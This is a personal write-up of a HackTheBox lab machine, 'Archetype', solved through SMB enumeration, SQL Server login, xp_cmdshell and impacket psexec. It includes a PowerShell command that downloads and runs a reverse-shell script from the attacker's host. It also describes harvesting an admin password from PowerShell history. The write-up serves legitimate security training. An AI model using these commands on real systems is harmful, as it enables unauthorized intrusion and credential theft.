I have been quite familiar with TryHackMe, but I found another service called HackTheBox which appears to be very similar.
I’ve started with the first box in the Starting Point, a windows machine named Archetype
Enumeration
First things first, lets see what we are working with by running an nmap scan.
We can see we have an smb share running on port 139/445, and a SQL Server instance running on 1433. No remote desktop or ssh active.
Next, let’s check out the smb share using smbclient, and specify no user / pass
Everything with a trailing $ is a normal occurrence, however we do have a backups share here. I found we can access this share as a guest as well
In the smb prompt, we can use more prod.dtsConfig to output the contents to the screen, and this returns us credentials for the SQL Server:
Now we just need to find a way to login using these credentials. On Kali Linux, we can use impacket, located in /opt/impacket.
One of the files in the examples folder is mssqlclient.py. Running this file gives you a help guide for the syntax, which is:python3 mssqlclient.py user:pass@host, we can also use -windows-auth because our credentials are for a domain user. Doing so:
Grants us a connection into the server!
Connection
We are officially authenticated into the server, SQL Server that is.
I use the help command to see what we can do. Next, I enable the cmdshell using enable_xp_cmdshell. Now we have the ability to run commands, so we need to craft a payload to give us an actual shell.
I did some googling and found that we can execute PowerShell via the xp_cmdshell by doing a command like:
xp_cmdshell `powershell -command "code here"`
I did some googling and found this payload: https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
I am going to modify it to use my IP and port 4444. Now we need to get the file over to the server. First we need to start a python web server where I have the file, python3 -m "http.server" 80.
From more googling, I see we can create a new object with PS and use the Download Data command to retrieve and run the file. So let’s try that with the sql command line:
xp_cmdshell "powershell -exec bypass IEX (New-Object System.Net.WebClient).DownloadString(\"http://10.10.14.189/sh.ps1\")"
Success! We get a reverse shell back from our victim!
Browsing around, I found a user.txt file in our sql_svc user’s desktop! There’s one flag!
Priv Esc
However, we need to see if we can get admin privileges. Let’s gather some more information first.
Running net users gets us a list of all users on the machine
We can now run net user Administrator for detailed information on this account:
We can also look and see what the history was for Powershell before we logged in to see if there were any credentials passed and saved. This file is located in %APPDATA%\Roaming\Microsoft\Windows\PowerShell\PSReadLine. And if we cat ConsoleHost_history.txt then we get an admin user/pass!
Now, I am launching Metasploit using msfconsole. From this link I found there are wo modules in impacket that we can try, psexec.py or smbexec.py. First I will try psexec.py:
I had issues trying to specify the password directly in the command, but I found if I let it prompt me for the pass, I could type it and it worked!
Now I did the same as the user account and found the flag on the Admin’s desktop!
Conclusion
Compared to TryHackMe, HackTheBox seems a lot more geared for the real world and a lot less hands off. I had difficulties figuring out what I was supposed to do at first because absolutely no information is provided. I finally figured out how to get the User flag and thought I was done but the machine was not checked off. Then I realized “System Owns” means gaining root access, so I went back in to get the admin.
My experience with enumeration and cracking on windows is also not as straight-forward as Linux, so a lot of googling was involved to help me gain access. I look forward to the next challenge!
